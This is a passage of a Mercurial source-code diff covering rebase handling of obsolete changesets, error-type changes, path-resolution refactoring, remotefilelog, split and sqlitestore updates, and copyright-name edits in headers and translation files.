self.ui, obsoleteset, skippedset) + allowdivergence = self.ui.configbool( + b'experimental', b'evolution.allowdivergence' + ) + if allowdivergence: + self.obsolete_with_successor_in_rebase_set = set() + else: + for rev in self.repo.revs( + b'descendants(%ld) and not %ld', + self.obsolete_with_successor_in_rebase_set, + self.obsolete_with_successor_in_rebase_set, + ): + self.state.pop(rev, None) + self.destmap.pop(rev, None) def _prepareabortorcontinue( self, isabort, backup=True, suppwarns=False, dryrun=False, confirm=False @@ -366,6 +382,8 @@ self.resume = True try: self.restorestatus() + # Calculate self.obsolete_* sets + self._handleskippingobsolete() self.collapsemsg = restorecollapsemsg(self.repo, isabort) except error.RepoLookupError: if isabort: @@ -396,15 +414,6 @@ if not destmap: return _nothingtorebase() - rebaseset = destmap.keys() - if not self.keepf: - try: - rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') - except error.Abort as e: - if e.hint is None: - e.hint = _(b'use --keep to keep original changesets') - raise e - result = buildstate(self.repo, destmap, self.collapsef) if not result: @@ -416,7 +425,7 @@ if self.collapsef: dests = set(self.destmap.values()) if len(dests) != 1: - raise error.Abort( + raise error.InputError( _(b'--collapse does not work with multiple destinations') ) destrev = next(iter(dests)) @@ -430,6 +439,20 @@ if dest.closesbranch() and not self.keepbranchesf: self.ui.status(_(b'reopening closed branch head %s\n') % dest) + # Calculate self.obsolete_* sets + self._handleskippingobsolete() + + if not self.keepf: + rebaseset = set(destmap.keys()) + rebaseset -= set(self.obsolete_with_successor_in_destination) + rebaseset -= self.obsolete_with_successor_in_rebase_set + try: + rewriteutil.precheck(self.repo, rebaseset, action=b'rebase') + except error.Abort as e: + if e.hint is None: + e.hint = _(b'use --keep to keep original changesets') + raise e + self.prepared = True def _assignworkingcopy(self): @@ -461,14 +484,10 
@@ for rev in self.state: branches.add(repo[rev].branch()) if len(branches) > 1: - raise error.Abort( + raise error.InputError( _(b'cannot collapse multiple named branches') ) - # Calculate self.obsoletenotrebased - obsrevs = _filterobsoleterevs(self.repo, self.state) - self._handleskippingobsolete(obsrevs, self.destmap) - # Keep track of the active bookmarks in order to reset them later self.activebookmark = self.activebookmark or repo._activebookmark if self.activebookmark: @@ -490,19 +509,10 @@ def progress(ctx): p.increment(item=(b"%d:%s" % (ctx.rev(), ctx))) - allowdivergence = self.ui.configbool( - b'experimental', b'evolution.allowdivergence' - ) for subset in sortsource(self.destmap): sortedrevs = self.repo.revs(b'sort(%ld, -topo)', subset) - if not allowdivergence: - sortedrevs -= self.repo.revs( - b'descendants(%ld) and not %ld', - self.obsoletewithoutsuccessorindestination, - self.obsoletewithoutsuccessorindestination, - ) for rev in sortedrevs: - self._rebasenode(tr, rev, allowdivergence, progress) + self._rebasenode(tr, rev, progress) p.complete() ui.note(_(b'rebase merging completed\n')) @@ -564,16 +574,13 @@ return newnode - def _rebasenode(self, tr, rev, allowdivergence, progressfn): + def _rebasenode(self, tr, rev, progressfn): repo, ui, opts = self.repo, self.ui, self.opts ctx = repo[rev] desc = _ctxdesc(ctx) if self.state[rev] == rev: ui.status(_(b'already rebased %s\n') % desc) - elif ( - not allowdivergence - and rev in self.obsoletewithoutsuccessorindestination - ): + elif rev in self.obsolete_with_successor_in_rebase_set: msg = ( _( b'note: not rebasing %s and its descendants as ' @@ -583,8 +590,8 @@ ) repo.ui.status(msg) self.skipped.add(rev) - elif rev in self.obsoletenotrebased: - succ = self.obsoletenotrebased[rev] + elif rev in self.obsolete_with_successor_in_destination: + succ = self.obsolete_with_successor_in_destination[rev] if succ is None: msg = _(b'note: not rebasing %s, it has no successor\n') % desc else: @@ -610,7 +617,7 @@ 
self.destmap, self.state, self.skipped, - self.obsoletenotrebased, + self.obsolete_with_successor_in_destination, ) if self.resume and self.wctx.p1().rev() == p1: repo.ui.debug(b'resuming interrupted rebase\n') @@ -722,7 +729,7 @@ self.destmap, self.state, self.skipped, - self.obsoletenotrebased, + self.obsolete_with_successor_in_destination, ) editopt = opts.get(b'edit') editform = b'rebase.collapse' @@ -1085,10 +1092,10 @@ with repo.wlock(), repo.lock(): rbsrt.restorestatus() if rbsrt.collapsef: - raise error.Abort(_(b"cannot stop in --collapse session")) + raise error.StateError(_(b"cannot stop in --collapse session")) allowunstable = obsolete.isenabled(repo, obsolete.allowunstableopt) if not (rbsrt.keepf or allowunstable): - raise error.Abort( + raise error.StateError( _( b"cannot remove original changesets with" b" unrebased descendants" @@ -1112,6 +1119,8 @@ with ui.configoverride(overrides, b'rebase'): return _dorebase(ui, repo, action, opts, inmemory=inmemory) except error.InMemoryMergeConflictsError: + if ui.configbool(b'devel', b'rebase.force-in-memory-merge'): + raise ui.warn( _( b'hit merge conflicts; re-running rebase without in-memory' @@ -1210,14 +1219,16 @@ ) % help ) - raise error.Abort(msg) + raise error.InputError(msg) if rbsrt.collapsemsg and not rbsrt.collapsef: - raise error.Abort(_(b'message can only be specified with collapse')) + raise error.InputError( + _(b'message can only be specified with collapse') + ) if action: if rbsrt.collapsef: - raise error.Abort( + raise error.InputError( _(b'cannot use collapse with continue or abort') ) if action == b'abort' and opts.get(b'tool', False): @@ -1284,7 +1295,7 @@ cmdutil.bailifchanged(repo) if ui.configbool(b'commands', b'rebase.requiredest') and not destf: - raise error.Abort( + raise error.InputError( _(b'you must specify a destination'), hint=_(b'use: hg rebase -d REV'), ) @@ -1378,7 +1389,7 @@ return None if wdirrev in rebaseset: - raise error.Abort(_(b'cannot rebase the working copy')) + 
raise error.InputError(_(b'cannot rebase the working copy')) rebasingwcp = repo[b'.'].rev() in rebaseset ui.log( b"rebase", @@ -1416,7 +1427,7 @@ elif size == 0: ui.note(_(b'skipping %s - empty destination\n') % repo[r]) else: - raise error.Abort( + raise error.InputError( _(b'rebase destination for %s is not unique') % repo[r] ) @@ -1449,7 +1460,7 @@ return nullrev if len(parents) == 1: return parents.pop() - raise error.Abort( + raise error.StateError( _( b'unable to collapse on top of %d, there is more ' b'than one external parent: %s' @@ -1649,7 +1660,7 @@ b"to force the rebase please set " b"experimental.evolution.allowdivergence=True" ) - raise error.Abort(msg % (b",".join(divhashes),), hint=h) + raise error.StateError(msg % (b",".join(divhashes),), hint=h) def successorrevs(unfi, rev): @@ -1752,7 +1763,7 @@ # /| # None of A and B will be changed to D and rebase fails. # A B D if set(newps) == set(oldps) and dest not in newps: - raise error.Abort( + raise error.InputError( _( b'cannot rebase %d:%s without ' b'moving at least one of its parents' @@ -1764,7 +1775,7 @@ # impossible. With multi-dest, the initial check does not cover complex # cases since we don't have abstractions to dry-run rebase cheaply. if any(p != nullrev and isancestor(rev, p) for p in newps): - raise error.Abort(_(b'source is ancestor of destination')) + raise error.InputError(_(b'source is ancestor of destination')) # Check if the merge will contain unwanted changes. 
That may happen if # there are multiple special (non-changelog ancestor) merge bases, which @@ -1826,7 +1837,7 @@ if revs is not None ) ) - raise error.Abort( + raise error.InputError( _(b'rebasing %d:%s will include unwanted changes from %s') % (rev, repo[rev], unwanteddesc) ) @@ -1971,7 +1982,7 @@ if destmap[r] not in srcset: result.append(r) if not result: - raise error.Abort(_(b'source and destination form a cycle')) + raise error.InputError(_(b'source and destination form a cycle')) srcset -= set(result) yield result @@ -1991,12 +2002,12 @@ if b'qtip' in repo.tags(): mqapplied = {repo[s.node].rev() for s in repo.mq.applied} if set(destmap.values()) & mqapplied: - raise error.Abort(_(b'cannot rebase onto an applied mq patch')) + raise error.StateError(_(b'cannot rebase onto an applied mq patch')) # Get "cycle" error early by exhausting the generator. sortedsrc = list(sortsource(destmap)) # a list of sorted revs if not sortedsrc: - raise error.Abort(_(b'no matching revisions')) + raise error.InputError(_(b'no matching revisions')) # Only check the first batch of revisions to rebase not depending on other # rebaseset. This means "source is ancestor of destination" for the second @@ -2004,7 +2015,7 @@ # "defineparents" to do that check. 
roots = list(repo.set(b'roots(%ld)', sortedsrc[0])) if not roots: - raise error.Abort(_(b'no matching revisions')) + raise error.InputError(_(b'no matching revisions')) def revof(r): return r.rev() @@ -2016,7 +2027,7 @@ dest = repo[destmap[root.rev()]] commonbase = root.ancestor(dest) if commonbase == root: - raise error.Abort(_(b'source is ancestor of destination')) + raise error.InputError(_(b'source is ancestor of destination')) if commonbase == dest: wctx = repo[None] if dest == wctx.p1(): @@ -2109,7 +2120,7 @@ if ui.configbool(b'commands', b'rebase.requiredest'): msg = _(b'rebase destination required by configuration') hint = _(b'use hg pull followed by hg rebase -d DEST') - raise error.Abort(msg, hint=hint) + raise error.InputError(msg, hint=hint) with repo.wlock(), repo.lock(): if opts.get('update'): @@ -2166,34 +2177,24 @@ commands.update(ui, repo) else: if opts.get('tool'): - raise error.Abort(_(b'--tool can only be used with --rebase')) + raise error.InputError(_(b'--tool can only be used with --rebase')) ret = orig(ui, repo, *args, **opts) return ret -def _filterobsoleterevs(repo, revs): - """returns a set of the obsolete revisions in revs""" - return {r for r in revs if repo[r].obsolete()} - +def _compute_obsolete_sets(repo, rebaseobsrevs, destmap): + """Figure out what to do about about obsolete revisions -def _computeobsoletenotrebased(repo, rebaseobsrevs, destmap): - """Return (obsoletenotrebased, obsoletewithoutsuccessorindestination). - - `obsoletenotrebased` is a mapping mapping obsolete => successor for all + `obsolete_with_successor_in_destination` is a mapping mapping obsolete => successor for all obsolete nodes to be rebased given in `rebaseobsrevs`. - `obsoletewithoutsuccessorindestination` is a set with obsolete revisions - without a successor in destination. - - `obsoleteextinctsuccessors` is a set of obsolete revisions with only - obsolete successors. 
+ `obsolete_with_successor_in_rebase_set` is a set with obsolete revisions, + without a successor in destination, that would cause divergence. """ - obsoletenotrebased = {} - obsoletewithoutsuccessorindestination = set() - obsoleteextinctsuccessors = set() + obsolete_with_successor_in_destination = {} + obsolete_with_successor_in_rebase_set = set() - assert repo.filtername is None cl = repo.changelog get_rev = cl.index.get_rev extinctrevs = set(repo.revs(b'extinct()')) @@ -2205,29 +2206,25 @@ successors.remove(srcnode) succrevs = {get_rev(s) for s in successors} succrevs.discard(None) - if succrevs.issubset(extinctrevs): - # all successors are extinct - obsoleteextinctsuccessors.add(srcrev) - if not successors: - # no successor - obsoletenotrebased[srcrev] = None + if not successors or succrevs.issubset(extinctrevs): + # no successor, or all successors are extinct + obsolete_with_successor_in_destination[srcrev] = None else: dstrev = destmap[srcrev] for succrev in succrevs: if cl.isancestorrev(succrev, dstrev): - obsoletenotrebased[srcrev] = succrev + obsolete_with_successor_in_destination[srcrev] = succrev break else: # If 'srcrev' has a successor in rebase set but none in # destination (which would be catched above), we shall skip it # and its descendants to avoid divergence. 
if srcrev in extinctrevs or any(s in destmap for s in succrevs): - obsoletewithoutsuccessorindestination.add(srcrev) + obsolete_with_successor_in_rebase_set.add(srcrev) return ( - obsoletenotrebased, - obsoletewithoutsuccessorindestination, - obsoleteextinctsuccessors, + obsolete_with_successor_in_destination, + obsolete_with_successor_in_rebase_set, ) diff --git a/hgext/releasenotes.py b/hgext/releasenotes.py --- a/hgext/releasenotes.py +++ b/hgext/releasenotes.py @@ -280,7 +280,7 @@ if b'.hgreleasenotes' in ctx: read(b'.hgreleasenotes') - return p[b'sections'] + return p.items(b'sections') def checkadmonitions(ui, repo, directives, revs): diff --git a/hgext/relink.py b/hgext/relink.py --- a/hgext/relink.py +++ b/hgext/relink.py @@ -19,7 +19,10 @@ registrar, util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) cmdtable = {} command = registrar.command(cmdtable) @@ -62,10 +65,11 @@ util, b'samedevice' ): raise error.Abort(_(b'hardlinks are not supported on this system')) - src = hg.repository( - repo.baseui, - ui.expandpath(origin or b'default-relink', origin or b'default'), - ) + + if origin is None and b'default-relink' in ui.paths: + origin = b'default-relink' + path, __ = urlutil.get_unique_pull_path(b'relink', repo, ui, origin) + src = hg.repository(repo.baseui, path) ui.status(_(b'relinking %s to %s\n') % (src.store.path, repo.store.path)) if repo.root == src.root: ui.status(_(b'there is nothing to relink\n')) diff --git a/hgext/remotefilelog/__init__.py b/hgext/remotefilelog/__init__.py --- a/hgext/remotefilelog/__init__.py +++ b/hgext/remotefilelog/__init__.py @@ -215,6 +215,8 @@ configitem(b'remotefilelog', b'backgroundprefetch', default=False) configitem(b'remotefilelog', b'prefetchdelay', default=120) configitem(b'remotefilelog', b'prefetchdays', default=14) +# Other values include 'local' or 'none'. Any unrecognized value is 'all'. 
+configitem(b'remotefilelog', b'strip.includefiles', default='all') configitem(b'remotefilelog', b'getfilesstep', default=10000) configitem(b'remotefilelog', b'getfilestype', default=b'optimistic') @@ -886,7 +888,7 @@ progress.update(count) count += 1 try: - path = ui.expandpath(os.path.normpath(path)) + path = util.expandpath(os.path.normpath(path)) except TypeError as e: ui.warn(_(b"warning: malformed path: %r:%s\n") % (path, e)) traceback.print_exc() diff --git a/hgext/remotefilelog/connectionpool.py b/hgext/remotefilelog/connectionpool.py --- a/hgext/remotefilelog/connectionpool.py +++ b/hgext/remotefilelog/connectionpool.py @@ -8,7 +8,6 @@ from __future__ import absolute_import from mercurial import ( - extensions, hg, pycompat, sshpeer, @@ -43,17 +42,19 @@ if conn is None: - def _cleanup(orig): - # close pipee first so peer.cleanup reading it won't deadlock, - # if there are other processes with pipeo open (i.e. us). - peer = orig.im_self - if util.safehasattr(peer, 'pipee'): - peer.pipee.close() - return orig() + peer = hg.peer(self._repo.ui, {}, path) + if util.safehasattr(peer, '_cleanup'): - peer = hg.peer(self._repo.ui, {}, path) - if util.safehasattr(peer, 'cleanup'): - extensions.wrapfunction(peer, b'cleanup', _cleanup) + class mypeer(peer.__class__): + def _cleanup(self, warn=None): + # close pipee first so peer.cleanup reading it won't + # deadlock, if there are other processes with pipeo + # open (i.e. us). 
+ if util.safehasattr(self, 'pipee'): + self.pipee.close() + return super(mypeer, self)._cleanup() + + peer.__class__ = mypeer conn = connection(pathpool, peer) diff --git a/hgext/remotefilelog/contentstore.py b/hgext/remotefilelog/contentstore.py --- a/hgext/remotefilelog/contentstore.py +++ b/hgext/remotefilelog/contentstore.py @@ -365,7 +365,7 @@ ledger.markdataentry(self, treename, node) ledger.markhistoryentry(self, treename, node) - for path, encoded, size in self._store.datafiles(): + for t, path, encoded, size in self._store.datafiles(): if path[:5] != b'meta/' or path[-2:] != b'.i': continue diff --git a/hgext/remotefilelog/remotefilelog.py b/hgext/remotefilelog/remotefilelog.py --- a/hgext/remotefilelog/remotefilelog.py +++ b/hgext/remotefilelog/remotefilelog.py @@ -155,12 +155,12 @@ # text passed to "addrevision" includes hg filelog metadata header if node is None: node = storageutil.hashrevisionsha1(text, p1, p2) - if sidedata is None: - sidedata = {} meta, metaoffset = storageutil.parsemeta(text) rawtext, validatehash = flagutil.processflagswrite( - self, text, flags, sidedata=sidedata + self, + text, + flags, ) return self.addrawrevision( rawtext, @@ -306,6 +306,7 @@ assumehaveparentrevisions=False, deltaprevious=False, deltamode=None, + sidedata_helpers=None, ): # we don't use any of these parameters here del nodesorder, revisiondata, assumehaveparentrevisions, deltaprevious @@ -333,6 +334,8 @@ baserevisionsize=None, revision=revision, delta=delta, + # Sidedata is not supported yet + sidedata=None, ) def revdiff(self, node1, node2): diff --git a/hgext/remotefilelog/remotefilelogserver.py b/hgext/remotefilelog/remotefilelogserver.py --- a/hgext/remotefilelog/remotefilelogserver.py +++ b/hgext/remotefilelog/remotefilelogserver.py @@ -164,24 +164,26 @@ b'.d' ): n = util.pconvert(fp[striplen:]) - yield (store.decodedir(n), n, st.st_size) + d = store.decodedir(n) + t = store.FILETYPE_OTHER + yield (t, d, n, st.st_size) if kind == stat.S_IFDIR: 
visit.append(fp) if scmutil.istreemanifest(repo): - for (u, e, s) in repo.store.datafiles(): + for (t, u, e, s) in repo.store.datafiles(): if u.startswith(b'meta/') and ( u.endswith(b'.i') or u.endswith(b'.d') ): - yield (u, e, s) + yield (t, u, e, s) # Return .d and .i files that do not match the shallow pattern match = state.match if match and not match.always(): - for (u, e, s) in repo.store.datafiles(): + for (t, u, e, s) in repo.store.datafiles(): f = u[5:-2] # trim data/... and .i/.d if not state.match(f): - yield (u, e, s) + yield (t, u, e, s) for x in repo.store.topfiles(): if state.noflatmf and x[0][:11] == b'00manifest.': diff --git a/hgext/remotefilelog/shallowbundle.py b/hgext/remotefilelog/shallowbundle.py --- a/hgext/remotefilelog/shallowbundle.py +++ b/hgext/remotefilelog/shallowbundle.py @@ -67,7 +67,7 @@ shallowcg1packer, self, nodelist, rlog, lookup, units=units ) - def generatefiles(self, changedfiles, *args): + def generatefiles(self, changedfiles, *args, **kwargs): try: linknodes, commonrevs, source = args except ValueError: @@ -92,7 +92,9 @@ [f for f in changedfiles if not repo.shallowmatch(f)] ) - return super(shallowcg1packer, self).generatefiles(changedfiles, *args) + return super(shallowcg1packer, self).generatefiles( + changedfiles, *args, **kwargs + ) def shouldaddfilegroups(self, source): repo = self._repo @@ -102,6 +104,18 @@ if source == b"push" or source == b"bundle": return AllFiles + # We won't actually strip the files, but we should put them in any + # backup bundle generated by strip (especially for cases like narrow's + # `hg tracked --removeinclude`, as failing to do so means that the + # "saved" changesets during a strip won't have their files reapplied and + # thus their linknode adjusted, if necessary). 
+ if source == b"strip": + cfg = repo.ui.config(b'remotefilelog', b'strip.includefiles') + if cfg == b'local': + return LocalFiles + elif cfg != b'none': + return AllFiles + caps = self._bundlecaps or [] if source == b"serve" or source == b"pull": if constants.BUNDLE2_CAPABLITY in caps: @@ -176,9 +190,11 @@ repo.shallowmatch = original -def addchangegroupfiles(orig, repo, source, revmap, trp, expectedfiles, *args): +def addchangegroupfiles( + orig, repo, source, revmap, trp, expectedfiles, *args, **kwargs +): if not shallowutil.isenabled(repo): - return orig(repo, source, revmap, trp, expectedfiles, *args) + return orig(repo, source, revmap, trp, expectedfiles, *args, **kwargs) newfiles = 0 visited = set() @@ -272,7 +288,7 @@ revisiondata = revisiondatas[(f, node)] # revisiondata: (node, p1, p2, cs, deltabase, delta, flags) - node, p1, p2, linknode, deltabase, delta, flags = revisiondata + node, p1, p2, linknode, deltabase, delta, flags, sidedata = revisiondata if not available(f, node, f, deltabase): continue diff --git a/hgext/schemes.py b/hgext/schemes.py --- a/hgext/schemes.py +++ b/hgext/schemes.py @@ -52,7 +52,9 @@ pycompat, registrar, templater, - util, +) +from mercurial.utils import ( + urlutil, ) cmdtable = {} @@ -86,7 +88,7 @@ ) def resolve(self, url): - # Should this use the util.url class, or is manual parsing better? + # Should this use the urlutil.url class, or is manual parsing better? 
try: url = url.split(b'://', 1)[1] except IndexError: @@ -137,7 +139,7 @@ ) hg.schemes[scheme] = ShortRepository(url, scheme, t) - extensions.wrapfunction(util, b'hasdriveletter', hasdriveletter) + extensions.wrapfunction(urlutil, b'hasdriveletter', hasdriveletter) @command(b'debugexpandscheme', norepo=True) diff --git a/hgext/share.py b/hgext/share.py --- a/hgext/share.py +++ b/hgext/share.py @@ -1,4 +1,4 @@ -# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com> +# Copyright 2006, 2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -12,7 +12,7 @@ from mercurial.i18n import _ from mercurial.node import ( - nullid, + nullrev, short, ) @@ -27,6 +27,7 @@ revsetlang, rewriteutil, scmutil, + util, ) # allow people to use split without explicitly enabling rebase extension @@ -69,57 +70,62 @@ if opts.get(b'rev'): revlist.append(opts.get(b'rev')) revlist.extend(revs) - with repo.wlock(), repo.lock(), repo.transaction(b'split') as tr: - revs = scmutil.revrange(repo, revlist or [b'.']) - if len(revs) > 1: - raise error.InputError(_(b'cannot split multiple revisions')) + with repo.wlock(), repo.lock(): + tr = repo.transaction(b'split') + # If the rebase somehow runs into conflicts, make sure + # we close the transaction so the user can continue it. + with util.acceptintervention(tr): + revs = scmutil.revrange(repo, revlist or [b'.']) + if len(revs) > 1: + raise error.InputError(_(b'cannot split multiple revisions')) - rev = revs.first() - ctx = repo[rev] - # Handle nullid specially here (instead of leaving for precheck() - # below) so we get a nicer message and error code. 
- if rev is None or ctx.node() == nullid: - ui.status(_(b'nothing to split\n')) - return 1 - if ctx.node() is None: - raise error.InputError(_(b'cannot split working directory')) + rev = revs.first() + # Handle nullrev specially here (instead of leaving for precheck() + # below) so we get a nicer message and error code. + if rev is None or rev == nullrev: + ui.status(_(b'nothing to split\n')) + return 1 + ctx = repo[rev] + if ctx.node() is None: + raise error.InputError(_(b'cannot split working directory')) - if opts.get(b'rebase'): - # Skip obsoleted descendants and their descendants so the rebase - # won't cause conflicts for sure. - descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev)) - torebase = list( - repo.revs( - b'%ld - (%ld & obsolete())::', descendants, descendants + if opts.get(b'rebase'): + # Skip obsoleted descendants and their descendants so the rebase + # won't cause conflicts for sure. + descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev)) + torebase = list( + repo.revs( + b'%ld - (%ld & obsolete())::', descendants, descendants + ) ) - ) - else: - torebase = [] - rewriteutil.precheck(repo, [rev] + torebase, b'split') + else: + torebase = [] + rewriteutil.precheck(repo, [rev] + torebase, b'split') - if len(ctx.parents()) > 1: - raise error.InputError(_(b'cannot split a merge changeset')) + if len(ctx.parents()) > 1: + raise error.InputError(_(b'cannot split a merge changeset')) - cmdutil.bailifchanged(repo) + cmdutil.bailifchanged(repo) - # Deactivate bookmark temporarily so it won't get moved unintentionally - bname = repo._activebookmark - if bname and repo._bookmarks[bname] != ctx.node(): - bookmarks.deactivate(repo) + # Deactivate bookmark temporarily so it won't get moved + # unintentionally + bname = repo._activebookmark + if bname and repo._bookmarks[bname] != ctx.node(): + bookmarks.deactivate(repo) - wnode = repo[b'.'].node() - top = None - try: - top = dosplit(ui, repo, tr, ctx, opts) - finally: - # top is None: split failed, 
need update --clean recovery. - # wnode == ctx.node(): wnode split, no need to update. - if top is None or wnode != ctx.node(): - hg.clean(repo, wnode, show_stats=False) - if bname: - bookmarks.activate(repo, bname) - if torebase and top: - dorebase(ui, repo, torebase, top) + wnode = repo[b'.'].node() + top = None + try: + top = dosplit(ui, repo, tr, ctx, opts) + finally: + # top is None: split failed, need update --clean recovery. + # wnode == ctx.node(): wnode split, no need to update. + if top is None or wnode != ctx.node(): + hg.clean(repo, wnode, show_stats=False) + if bname: + bookmarks.activate(repo, bname) + if torebase and top: + dorebase(ui, repo, torebase, top) def dosplit(ui, repo, tr, ctx, opts): @@ -165,19 +171,26 @@ b'message': header + ctx.description(), } ) + origctx = repo[b'.'] commands.commit(ui, repo, **pycompat.strkwargs(opts)) newctx = repo[b'.'] - committed.append(newctx) + # Ensure user didn't do a "no-op" split (such as deselecting + # everything). + if origctx.node() != newctx.node(): + committed.append(newctx) if not committed: raise error.InputError(_(b'cannot split an empty revision')) - scmutil.cleanupnodes( - repo, - {ctx.node(): [c.node() for c in committed]}, - operation=b'split', - fixphase=True, - ) + if len(committed) != 1 or committed[0].node() != ctx.node(): + # Ensure we don't strip a node if we produce the same commit as already + # exists + scmutil.cleanupnodes( + repo, + {ctx.node(): [c.node() for c in committed]}, + operation=b'split', + fixphase=True, + ) return committed[-1] diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -54,6 +54,7 @@ from mercurial.node import ( nullid, nullrev, + sha1nodeconstants, short, ) from mercurial.thirdparty import attr @@ -288,6 +289,7 @@ baserevisionsize = attr.ib() revision = attr.ib() delta = attr.ib() + sidedata = attr.ib() linknode = attr.ib(default=None) @@ -304,6 +306,7 @@ """Implements storage for an individual 
tracked path.""" def __init__(self, db, path, compression): + self.nullid = sha1nodeconstants.nullid self._db = db self._path = path @@ -586,6 +589,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): if nodesorder not in (b'nodes', b'storage', b'linear', None): raise error.ProgrammingError( @@ -624,6 +628,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ): yield delta @@ -636,7 +641,8 @@ if meta or filedata.startswith(b'\x01\n'): filedata = storageutil.packmeta(meta, filedata) - return self.addrevision(filedata, transaction, linkrev, p1, p2) + rev = self.addrevision(filedata, transaction, linkrev, p1, p2) + return self.node(rev) def addrevision( self, @@ -658,15 +664,16 @@ if validatehash: self._checkhash(revisiondata, node, p1, p2) - if node in self._nodetorev: - return node + rev = self._nodetorev.get(node) + if rev is not None: + return rev - node = self._addrawrevision( + rev = self._addrawrevision( node, revisiondata, transaction, linkrev, p1, p2 ) self._revisioncache[node] = revisiondata - return node + return rev def addgroup( self, @@ -679,7 +686,16 @@ ): empty = True - for node, p1, p2, linknode, deltabase, delta, wireflags in deltas: + for ( + node, + p1, + p2, + linknode, + deltabase, + delta, + wireflags, + sidedata, + ) in deltas: storeflags = 0 if wireflags & repository.REVISION_FLAG_CENSORED: @@ -741,7 +757,7 @@ ) if duplicaterevisioncb: - duplicaterevisioncb(self, node) + duplicaterevisioncb(self, self.rev(node)) empty = False continue @@ -752,7 +768,7 @@ text = None storedelta = (deltabase, delta) - self._addrawrevision( + rev = self._addrawrevision( node, text, transaction, @@ -764,7 +780,7 @@ ) if addrevisioncb: - addrevisioncb(self, node) + addrevisioncb(self, rev) empty = False return not empty @@ -897,6 +913,10 @@ def files(self): return [] + def sidedata(self, nodeorrev, 
_df=None): + # Not supported for now + return {} + def storageinfo( self, exclusivefiles=False, @@ -1079,7 +1099,7 @@ self._revtonode[rev] = node self._revisions[node] = entry - return node + return rev class sqliterepository(localrepo.localrepository): diff --git a/hgext/transplant.py b/hgext/transplant.py --- a/hgext/transplant.py +++ b/hgext/transplant.py @@ -47,6 +47,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) @@ -818,7 +819,8 @@ sourcerepo = opts.get(b'source') if sourcerepo: - peer = hg.peer(repo, opts, ui.expandpath(sourcerepo)) + u = urlutil.get_unique_pull_path(b'transplant', repo, ui, sourcerepo)[0] + peer = hg.peer(repo, opts, u) heads = pycompat.maplist(peer.lookup, opts.get(b'branch', ())) target = set(heads) for r in revs: diff --git a/hgext/uncommit.py b/hgext/uncommit.py --- a/hgext/uncommit.py +++ b/hgext/uncommit.py @@ -175,7 +175,7 @@ old = repo[b'.'] rewriteutil.precheck(repo, [old.rev()], b'uncommit') if len(old.parents()) > 1: - raise error.Abort(_(b"cannot uncommit merge changeset")) + raise error.InputError(_(b"cannot uncommit merge changeset")) match = scmutil.match(old, pats, opts) @@ -202,7 +202,7 @@ else: hint = _(b"file does not exist") - raise error.Abort( + raise error.InputError( _(b'cannot uncommit "%s"') % scmutil.getuipathfn(repo)(f), hint=hint, ) @@ -280,7 +280,7 @@ markers = list(predecessormarkers(curctx)) if len(markers) != 1: e = _(b"changeset must have one predecessor, found %i predecessors") - raise error.Abort(e % len(markers)) + raise error.InputError(e % len(markers)) prednode = markers[0].prednode() predctx = unfi[prednode] diff --git a/hgext/win32text.py b/hgext/win32text.py --- a/hgext/win32text.py +++ b/hgext/win32text.py @@ -1,6 +1,6 @@ # win32text.py - LF <-> CRLF/CR translation utilities for Windows/Mac users # -# Copyright 2005, 2007-2009 Matt Mackall <mpm@selenic.com> and others +# Copyright 2005, 2007-2009 Olivia Mackall <olivia@selenic.com> and others # # This software may be used and 
distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/hgext/zeroconf/__init__.py b/hgext/zeroconf/__init__.py --- a/hgext/zeroconf/__init__.py +++ b/hgext/zeroconf/__init__.py @@ -1,6 +1,6 @@ # zeroconf.py - zeroconf support for Mercurial # -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/i18n/da.po b/i18n/da.po --- a/i18n/da.po +++ b/i18n/da.po @@ -1,6 +1,6 @@ # Danish translations for Mercurial # Danske oversættelser for Mercurial -# Copyright (C) 2009, 2010 Matt Mackall and others +# Copyright (C) 2009, 2010 Olivia Mackall and others # # Translation dictionary: # @@ -11359,11 +11359,11 @@ msgstr "(se http://mercurial.selenic.com for mere information)" msgid "" -"Copyright (C) 2005-2011 Matt Mackall and others\n" +"Copyright (C) 2005-2011 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2011 Matt Mackall og andre\n" +"Copyright (C) 2005-2011 Olivia Mackall og andre\n" "Dette er frit programmel; se kildekoden for kopieringsbetingelser. 
Der\n" "gives INGEN GARANTI; ikke engang for SALGBARHED eller EGNETHED FOR\n" "NOGET BESTEMT FORMÅL.\n" diff --git a/i18n/de.po b/i18n/de.po --- a/i18n/de.po +++ b/i18n/de.po @@ -1,6 +1,6 @@ # German translations for Mercurial # Deutsche Übersetzungen für Mercurial -# Copyright (C) 2009 Matt Mackall and others +# Copyright (C) 2009 Olivia Mackall and others # # Übersetzer: # Tobias Bell @@ -14536,11 +14536,11 @@ msgstr "(siehe http://mercurial.selenic.com für mehr Information)" msgid "" -"Copyright (C) 2005-2014 Matt Mackall and others\n" +"Copyright (C) 2005-2014 Olivia Mackall and others\n" "This is free software; see the source for copying conditions. There is NO\n" "warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\n" msgstr "" -"Copyright (C) 2005-2014 Matt Mackall und andere\n" +"Copyright (C) 2005-2014 Olivia Mackall und andere\n" "Dies ist freie Software; siehe Quellen für Kopierbestimmungen. Es besteht\n" "KEINE Gewährleistung für das Programm, nicht einmal der Marktreife oder der\n" "Verwendbarkeit für einen 